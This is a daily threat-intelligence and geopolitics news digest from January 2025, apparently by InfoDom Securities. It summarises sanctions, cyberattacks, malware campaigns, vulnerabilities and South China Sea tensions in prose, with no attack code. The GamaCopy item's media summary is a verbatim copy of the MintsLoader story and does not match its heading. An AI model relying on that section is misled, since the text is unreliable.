Monday, Jan 27, 2025 // (IG): BB // GITHUB // SN R&D
Why Sanctions on Rosatom are Crucial for International Security
Bottom Line Up Front (BLUF): The U.S. has imposed sanctions on Rosatom leadership and banned Russian uranium imports, breaking a longstanding precedent of inaction against Russia’s nuclear energy sector. Rosatom, a key player in the global nuclear market, not only dominates uranium enrichment but also supplies dual-use technologies critical for Russian weapons production. Broader international sanctions are essential to sever Western reliance on Russian nuclear materials and limit its military-industrial growth.
Analyst Comments: The sanctions on Rosatom signify the beginning of a necessary shift in addressing Russia’s nuclear energy influence. Rosatom has long evaded significant international measures, leveraging its technological dominance and partnerships to fuel both civilian and military initiatives. The company’s contributions to Russian weapons manufacturing, such as cruise missiles used in Ukraine, highlight its dual-purpose role. The U.S. ban on uranium imports is an important precedent but must be followed by similar European action to isolate Rosatom and disrupt its economic and geopolitical utility entirely. Failure to act will allow Russia to continue leveraging its nuclear monopoly as both a financial and military asset.
FROM THE MEDIA: Rosatom controls 40% of global uranium conversion and 46% of enrichment capacity, enabling it to maintain a dominant position. The company’s core divisions remained untouched despite prior sanctions on select subsidiaries. Beyond civilian nuclear projects, Rosatom supports weapons development, including cruise missiles like the Kh-101, through its subsidiaries. These missiles have been used in Russia’s ongoing aggression against Ukraine. The sanctions aim to reduce Western reliance on Russian energy while exposing the company’s role in aiding military production.
READ THE STORY: Infonapalm
Ukrainian Cyber Specialists Launch Major Attack on Russian Telecom Provider MegaFon
Bottom Line Up Front (BLUF): Ukraine's Defense Intelligence cyber specialists have reportedly carried out a large-scale cyberattack on Russia's MegaFon, a major telecom and internet provider. The operation disrupted mobile communications, internet services, and several online platforms critical to the Russian military and government, such as Steam, Twitch, and Discord.
Analyst Comments: This operation highlights the increasing use of cyber warfare as a strategic tool in Ukraine's defense against Russian aggression. By targeting critical telecom infrastructure, Ukraine disrupts Russian military coordination and weakens civilian morale. Additionally, the attack demonstrates Ukraine's cyber capabilities and its ability to strike deep into critical Russian systems. Moving forward, such incidents could escalate retaliatory cyber measures from Russia, potentially involving NATO-aligned entities in the broader cyber conflict.
FROM THE MEDIA: Ukrainian Defense Intelligence executed a "carpet DDoS attack" on MegaFon, a leading Russian telecom operator, disrupting services in Moscow, St. Petersburg, and central Russian regions. The operation reportedly caused widespread communication and internet disruptions, affecting other providers like Yota and NetByNet. Russian media and Roskomnadzor initially attributed the issues to unspecified technical failures. However, later reports revealed the disruptions stemmed from Ukraine's cyber operation. Platforms frequently used by Russian military personnel, such as Steam, Twitch, and Discord, were also temporarily inaccessible. Despite MegaFon’s claim that its network was operating normally, the Ukrainian cyberattack has exposed vulnerabilities in Russian communication infrastructure, further complicating Russia's ongoing aggression against Ukraine.
READ THE STORY: Ukrainian News
China Deploys New Communication Technology Satellite
Bottom Line Up Front (BLUF): China successfully launched the Communication Technology Demonstrator 14 satellite using a Long March 3B rocket from the Xichang Satellite Launch Center. The satellite is designed to test advanced space-based communication technologies, including television, radio signal relay, and data transmission. This mission marks the sixth rocket launch of 2025 and the 558th flight of the Long March rocket family.
Analyst Comments: This satellite launch highlights China's continued investment in enhancing its space-based communication capabilities. The mission is significant for testing advanced technologies and strengthening the country's ability to support both civilian and military communication networks. The reliable Long March 3B rocket remains a critical asset in China's expanding space program, capable of supporting diverse missions, including geostationary, medium-Earth, and lunar transfer orbits. With six launches completed in 2025, China is accelerating its efforts to assert dominance in space exploration and technology development, further solidifying its global influence in the aerospace sector.
FROM THE MEDIA: China launched the Communication Technology Demonstrator 14 satellite aboard a Long March 3B carrier rocket at 11:32 PM local time from the Xichang Satellite Launch Center in Sichuan province. Developed by the Shanghai Academy of Spaceflight Technology, the satellite aims to test advanced communication capabilities, such as television and radio signal relay and data transmission. The Long March 3B rocket, a widely used and reliable model, stands at 56.3 meters tall and weighs 456 metric tons when fully fueled. The missile is designed to deploy up to 5.5 tons of payloads into geostationary transfer orbits. This mission is the 558th flight of the Long March rocket series, reinforcing China’s position as a major player in global space exploration.
READ THE STORY: Spacewar
MintsLoader Malware Delivers StealC and BOINC in Targeted Cyber Attacks
Bottom Line Up Front (BLUF): A new campaign utilizing the PowerShell-based malware loader MintsLoader distributes the StealC information stealer and BOINC, an open-source computing platform. Delivered through spam emails and fake CAPTCHA pages, the attack targets the energy, legal, and oil sectors in the U.S. and Europe. The malware employs advanced evasion techniques and exploits social engineering tactics to bypass detection and infect systems.
Analyst Comments: The deployment of BOINC, typically a legitimate platform, shows how attackers are weaponizing trusted software for malicious purposes. The inclusion of the StealC stealer, designed to avoid Russian-aligned systems, suggests the involvement of a threat actor with specific geopolitical targets. Organizations must reinforce email security, conduct user awareness training, and enhance PowerShell monitoring to mitigate such threats.
FROM THE MEDIA: Cybersecurity researchers have uncovered an active campaign leveraging MintsLoader, a PowerShell-based malware loader, to distribute multiple payloads, including StealC and BOINC. eSentire detected the campaign in early January 2025, targeting critical industries such as energy, oil, gas, and legal services in the U.S. and Europe. Attackers use spam emails containing obfuscated JavaScript files or fake CAPTCHA prompts that instruct victims to execute malicious PowerShell scripts. Once executed, MintsLoader contacts a command-and-control (C2) server to download additional payloads, evade sandbox detection, and establish persistence. The campaign employs a Domain Generation Algorithm (DGA) to obfuscate C2 communications. One of the payloads, StealC, is a re-engineered information stealer known for its malware-as-a-service (MaaS) origins and its ability to bypass systems in certain post-Soviet states.
READ THE STORY: THN
Cisco Patches ClamAV Denial-of-Service Vulnerability with Exploit Code in the Wild
Bottom Line Up Front (BLUF): Cisco has addressed a ClamAV denial-of-service (DoS) vulnerability, identified as CVE-2025-20128, affecting Linux, Mac, and Windows systems. The flaw, caused by an integer underflow in the OLE2 decryption routine, could allow remote attackers to crash the ClamAV scanning process, resulting in service disruptions. A proof-of-concept (PoC) exploit code is publicly available, but Cisco has not detected any exploitation attempts in the wild.
Analyst Comments: The public availability of a PoC exploit increases the likelihood of attackers leveraging the flaw to disrupt operations or target vulnerable organizations. While Cisco’s swift response to release patches is commendable, organizations using affected ClamAV versions should prioritize updating to prevent potential service interruptions. The incident underscores the importance of monitoring security advisories and deploying patches promptly, particularly in environments relying heavily on open-source software.
FROM THE MEDIA: Cisco has released security updates to address a medium-impact vulnerability in its ClamAV antivirus engine, which is widely used for malware detection. The flaw (CVE-2025-20128) resides in the OLE2 decryption routine, where an integer underflow can cause a heap buffer overflow, potentially crashing the ClamAV scanning process. This vulnerability affects Secure Endpoint Connectors for Linux, Mac, and Windows, as well as the Secure Endpoint Private Cloud, with CVSS base scores of 6.9. The issue was reported by Google’s OSS-Fuzz program. While no exploitation in the wild has been observed, experts warn that a proof-of-concept (PoC) exploit is publicly available, increasing the urgency for affected users to apply Cisco’s patches immediately.
READ THE STORY: Securityaffairs
Trump's Economic Vision: A Return to Protectionism and Domestic Self-Reliance
Bottom Line Up Front (BLUF): President Trump has initiated a sweeping agenda to create a "Golden Age" for America, focusing on economic self-reliance, high tariffs, fossil fuel expansion, and domestic manufacturing. This vision accelerates protectionist policies while risking higher inflation, supply chain disruptions, and geopolitical tensions with allies and competitors.
Analyst Comments: While this strategy could bolster domestic industries and appeal to workers, it risks alienating multinational corporations, increasing consumer costs, and intensifying trade disputes. The administration’s actions reflect an ambition to reshape America’s role in the global economy, but the long-term sustainability of such an inward-facing model remains uncertain.
FROM THE MEDIA: President Trump has launched a flurry of executive orders promoting domestic manufacturing, imposing high import tariffs, and advancing oil and gas production. Tariffs of 10% on Chinese goods and 25% on imports from Canada and Mexico are set to take effect February 1, raising concerns over supply chain disruptions. Trump’s rhetoric draws comparisons to President McKinley, invoking protectionist policies of the Gilded Age. However, critics argue that this strategy could exacerbate inflation and undermine economic growth, with some economists warning of potential conflicts between tariffs, tax cuts, and energy policies. Labor union leaders and economic analysts have expressed mixed views on whether these measures will deliver tangible benefits for American workers.
READ THE STORY: FT
GamaCopy Threat Actor Mimics Gamaredon Tactics in Cyber Espionage Against Russian Entities
Bottom Line Up Front (BLUF): A new cyber espionage group named GamaCopy has been identified using tactics similar to the Kremlin-aligned Gamaredon group to target Russian-speaking entities. The campaign employs spear-phishing emails to deliver UltraVNC via self-extracting archives, enabling remote access to compromised systems. GamaCopy’s mimicry of Gamaredon’s tactics, combined with its use of open-source tools, complicates attribution and highlights evolving threats in the cyber espionage landscape.
Analyst Comments: The emergence of GamaCopy underscores the trend of threat actors imitating established groups to confuse researchers and hinder attribution efforts. By copying Gamaredon’s tactics, GamaCopy not only obscures its true identity but also capitalizes on known successful attack methods. The use of open-source tools like UltraVNC as payloads further demonstrates how attackers can leverage legitimate software to mask malicious intent. This campaign also emphasizes the ongoing cyber threat landscape shifts resulting from the Russo-Ukrainian war, with multiple groups targeting Russian entities for espionage purposes.
FROM THE MEDIA: Cybersecurity researchers have uncovered an active campaign leveraging MintsLoader, a PowerShell-based malware loader, to distribute multiple payloads, including StealC and BOINC. eSentire detected the campaign in early January 2025, targeting critical industries such as energy, oil, gas, and legal services in the U.S. and Europe. Attackers use spam emails containing obfuscated JavaScript files or fake CAPTCHA prompts that instruct victims to execute malicious PowerShell scripts. Once executed, MintsLoader contacts a command-and-control (C2) server to download additional payloads, evade sandbox detection, and establish persistence. The campaign employs a Domain Generation Algorithm (DGA) to obfuscate C2 communications. One of the payloads, StealC, is a re-engineered information stealer known for its malware-as-a-service (MaaS) origins and its ability to bypass systems in certain post-Soviet states.
READ THE STORY: THN
Egypt and Cyprus Discuss Strategic Cooperation on Natural Gas Development
Bottom Line Up Front (BLUF): Egypt and Cyprus are advancing plans to jointly develop natural gas fields, including the "Kronos" and "Aphrodite" fields, to transport gas to Egypt for liquefaction and export. This cooperation strengthens Egypt’s position as a regional energy hub and enhances energy security in the Eastern Mediterranean and Europe.
Analyst Comments: The focus on accelerating production and creating an energy corridor underscores the region’s strategic importance in linking Eastern Mediterranean gas reserves to European markets. Egypt’s well-established LNG infrastructure positions it as a key player in regional energy integration. Future cooperation may depend on the successful resolution of legal, commercial, and technical frameworks and ongoing geopolitical stability in the region.
FROM THE MEDIA: Egyptian Petroleum Minister Karim Badawi and Cypriot Energy Minister George Papanastasiou met in Nicosia to build on discussions initiated at the recent Trilateral Cooperation Mechanism summit with Greece. The two ministers agreed on linking Cyprus’s "Kronos" and "Aphrodite" gas fields to Egypt’s advanced LNG facilities to accelerate production at reduced costs. The project is expected to create an energy corridor connecting the Eastern Mediterranean to Europe, enhancing energy security and maximizing the utilization of gas resources. With Egypt’s robust LNG infrastructure, including processing plants and transportation networks, the collaboration will support the export of liquefied gas to global markets. Additionally, Badawi extended an invitation to Papanastasiou to attend the Egypt Energy Show (EGYPES 2025) in February to further deepen cooperation in the energy sector.
READ THE STORY: Egypt Today
Subaru Starlink Flaw Exposes Vehicles and Customer Accounts to Remote Attacks
Bottom Line Up Front (BLUF): Security researchers Sam Curry and Shubham Shah uncovered a critical vulnerability in Subaru’s Starlink-connected vehicle service, exposing vehicles and customer accounts in the US, Canada, and Japan to potential remote exploitation. The flaw enabled unauthorized access to vehicle controls, personal data, and location history. Subaru patched the vulnerability within 24 hours of being notified.
Analyst Comments: This incident underscores the critical need for robust cybersecurity measures in the automotive industry, particularly as connected vehicle services become more widespread. Subaru's rapid response is commendable, but the discovery highlights ongoing weaknesses in system design, such as insecure admin portals and poor multi-factor authentication (MFA) implementation. The ability to remotely control vehicles and access sensitive data presents a significant risk to users and reinforces the importance of comprehensive security testing during development. As connected car technologies proliferate, similar vulnerabilities could lead to more widespread attacks unless addressed proactively.
FROM THE MEDIA: Security researchers identified a flaw in Subaru’s Starlink platform that allowed attackers with minimal information—such as a victim’s last name, ZIP code, email, or license plate—to remotely access and control vehicles. The vulnerability also exposed sensitive data, including location history, personal details, and billing information. The exploit stemmed from Subaru's admin panel, which researchers discovered via subdomain scans. The team bypassed two-factor authentication and gained admin-level access by analyzing source code and exploiting a password reset endpoint. Once inside, they demonstrated the ability to remotely unlock a vehicle without the owner receiving any notifications. The vulnerability was responsibly disclosed to Subaru on November 20, 2024, and the company patched the issue within 24 hours.
READ THE STORY: Securityaffairs
OneBlood Data Breach Exposes Donor Social Security Numbers
Bottom Line Up Front (BLUF): OneBlood, a Florida-based nonprofit blood donation organization, suffered a cyberattack over the summer of 2024, exposing personal information, including Social Security numbers, of its donors. A class-action lawsuit alleges the organization failed to protect sensitive data and delayed notifying affected individuals.
Analyst Comments: This breach underscores the critical importance of timely breach detection and disclosure within organizations handling sensitive personal data. While OneBlood’s credit monitoring offer may address immediate risks, the delayed notification raises concerns about transparency and preparedness. Such incidents reinforce the need for stricter data protection measures and robust cybersecurity protocols, particularly in nonprofit organizations managing public trust.
FROM THE MEDIA: A class-action lawsuit filed by Amy Thrash in federal court alleges that OneBlood did not act swiftly to protect sensitive donor data during a cyberattack between July 14 and July 29, 2024. OneBlood reportedly became aware of the breach on July 28 but only completed its review of compromised data in December. The nonprofit began notifying affected individuals on January 9, 2025. The breach allegedly included Social Security numbers and personal details of donors, although the exact number of affected individuals remains undisclosed. Thrash claims she has experienced increased spam and now spends significant time monitoring her accounts for fraud. OneBlood has denied the allegations, stating that they acted promptly to investigate the incident and notify affected individuals in compliance with legal requirements. The organization is offering 12 months of credit monitoring to those impacted. The lawsuit also seeks damages and demands 10 years of credit monitoring as compensation for the delayed notification.
READ THE STORY: WFTV9
Slovak Prime Minister Accuses Ukraine of Cyberattack, Kyiv Strongly Denies Allegation
Bottom Line Up Front (BLUF): The Ukrainian Ministry of Foreign Affairs has categorically denied allegations from Slovak Prime Minister Robert Fico, who accused Ukraine of carrying out a cyberattack on Slovakia's national health insurance company. Local media later clarified that the incident was likely a phishing attempt rather than a large-scale cyberattack.
Analyst Comments: This diplomatic dispute highlights the fragility of relations between Ukraine and Slovakia under Robert Fico's leadership. Fico’s accusations against Ukraine may reflect his administration's skepticism toward Kyiv amidst ongoing regional tensions. By rejecting the claims, Ukraine signals its commitment to maintaining positive relations with Slovakia, an important NATO ally. However, Fico’s rhetoric could strain cooperation between the two nations, potentially impacting broader regional security dynamics.
FROM THE MEDIA: Slovak Prime Minister Robert Fico alleged that a "massive cyberattack" had targeted Slovakia’s national health insurance company and blamed Ukraine for the incident. Ukraine’s Ministry of Foreign Affairs strongly denied any involvement, calling the accusations baseless and urging Fico to stop looking for “imaginary enemies.” Slovak media reported that the event was not a sophisticated cyberattack but rather a phishing attempt aimed at the organization.
READ THE STORY: FREEDOM
Beirut Airport Cyberattack Breaches Flight Information Display System (FIDS)
Bottom Line Up Front (BLUF): Hackers launched a cyberattack on Beirut's Rafic Hariri International Airport, breaching the Flight Information Display System (FIDS) and displaying politically charged messages. The baggage inspection system (BHS) was also disrupted, forcing airport personnel to rely on police dogs for inspections. No group has claimed responsibility for the attack, which comes amid rising tensions between Israel and Lebanon.
Analyst Comments: The breach of critical infrastructure like FIDS and BHS at an international airport highlights the increasing risks to aviation systems. Politically motivated messages displayed by the attackers suggest the use of cyber operations to escalate regional tensions. The disruption to baggage inspection processes underscores the operational impact such attacks can have on airport functionality. This incident reinforces the need for robust cybersecurity measures for aviation systems, particularly in geopolitically sensitive areas. While attribution remains unclear, organizations in the region should remain vigilant against further potential cyber threats.
FROM THE MEDIA: Threat actors breached the Flight Information Display System (FIDS) at Rafic Hariri International Airport, Lebanon’s main gateway for domestic and international travel. The hackers displayed messages accusing Hezbollah and Iran of dragging the country into war and enabling arms smuggling that could endanger the airport. The attack also disrupted the airport’s Baggage Handling System (BHS), forcing personnel to use police dogs for baggage inspection. Lebanese outlet LBCI tied the attack to escalating tensions with Israel, though no group has claimed responsibility. The airport is a vital hub located 9 kilometers from Beirut’s city center, making the attack a significant disruption.
READ THE STORY: Securityaffairs
Items of interest
Philippines Halts Research Survey in South China Sea Amid Chinese "Harassment"
Bottom Line Up Front (BLUF): The Philippines suspended a marine scientific survey near Thitu Island in the contested South China Sea after Chinese navy and coast guard vessels allegedly engaged in "dangerous" harassment. The confrontation underscores escalating tensions between the two nations over disputed territories in the Spratly Islands.
Analyst Comments: The suspension of the survey reflects the challenges smaller nations face when asserting sovereignty in contested areas. Such actions may lead to further regional alignment against China's maritime claims, potentially amplifying international calls for adherence to the 2016 arbitration tribunal ruling, which invalidated China's expansive claims. Continued Chinese harassment could increase the risk of direct confrontation, testing diplomatic and security frameworks in the region.
FROM THE MEDIA: The Philippine Coast Guard announced the suspension of a marine scientific survey near Thitu Island on January 25, 2025, due to harassment by Chinese vessels. The survey, intended to collect sand samples from sandbars near Thitu Island, was halted after three Chinese coast guard vessels and four smaller boats made "aggressive maneuvers" towards the Philippine research ships and their inflatable boats. Additionally, a Chinese navy helicopter reportedly hovered at an unsafe altitude over the Filipino vessels, creating hazardous conditions with its rotor wash. While no accidents occurred, the Philippine Coast Guard cited these actions as a disregard for safety, forcing the operation's suspension. China, in response, accused the Philippine vessels of attempting to "illegally" land on Sandy Cay (referred to as Tiexian Reef by Beijing) and asserted its "unquestionable sovereignty" over the area. Chinese coast guard vessels claimed to have "repelled" the Filipino boats.
READ THE STORY: Spacewar
PH stops research survey after Chinese 'harassment' in disputed sea (Video)
FROM THE MEDIA: Handout footage from the Philippine Coast Guard shows alleged 'dangerous' harassment by Chinese Navy and Coast Guard vessels of Philippine boats transporting scientists intending to conduct a 'marine scientific survey and sand sampling' at a sandbar off Thitu island in the contested South China Sea. Three Chinese Coast Guard vessels and four smaller boats made 'aggressive maneuvers' toward two Philippine Bureau of Fisheries and Aquatic Resources ships and their inflatable boats this month, near Thitu island, a Philippine Coast Guard statement said.
Philippines Faces Down China's 'Monster' Ship (Video)
FROM THE MEDIA: China has begun 2025 with a near continuous presence of its 165-meter “monster” coast guard ship in the Philippine’s exclusive economic zone (EEZ) off the Philippine coast of Zambales. A further 60 to 70 nautical miles to the west is Scarborough Shoal, seized by China in 2012, but located within Manila's EEZ. The West Philippine Coast Guard says Beijing seeks to “normalize” its presence in this area and thereby change the status quo. In this show, South China Sea expert, Liu Fu-kuo, said that Chinese reports show it plans to militarize Scarborough Shoal to enhance the feature's strategic value, with Beijing waiting for an appropriate time.
The selected stories cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in its original material or related links on its sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.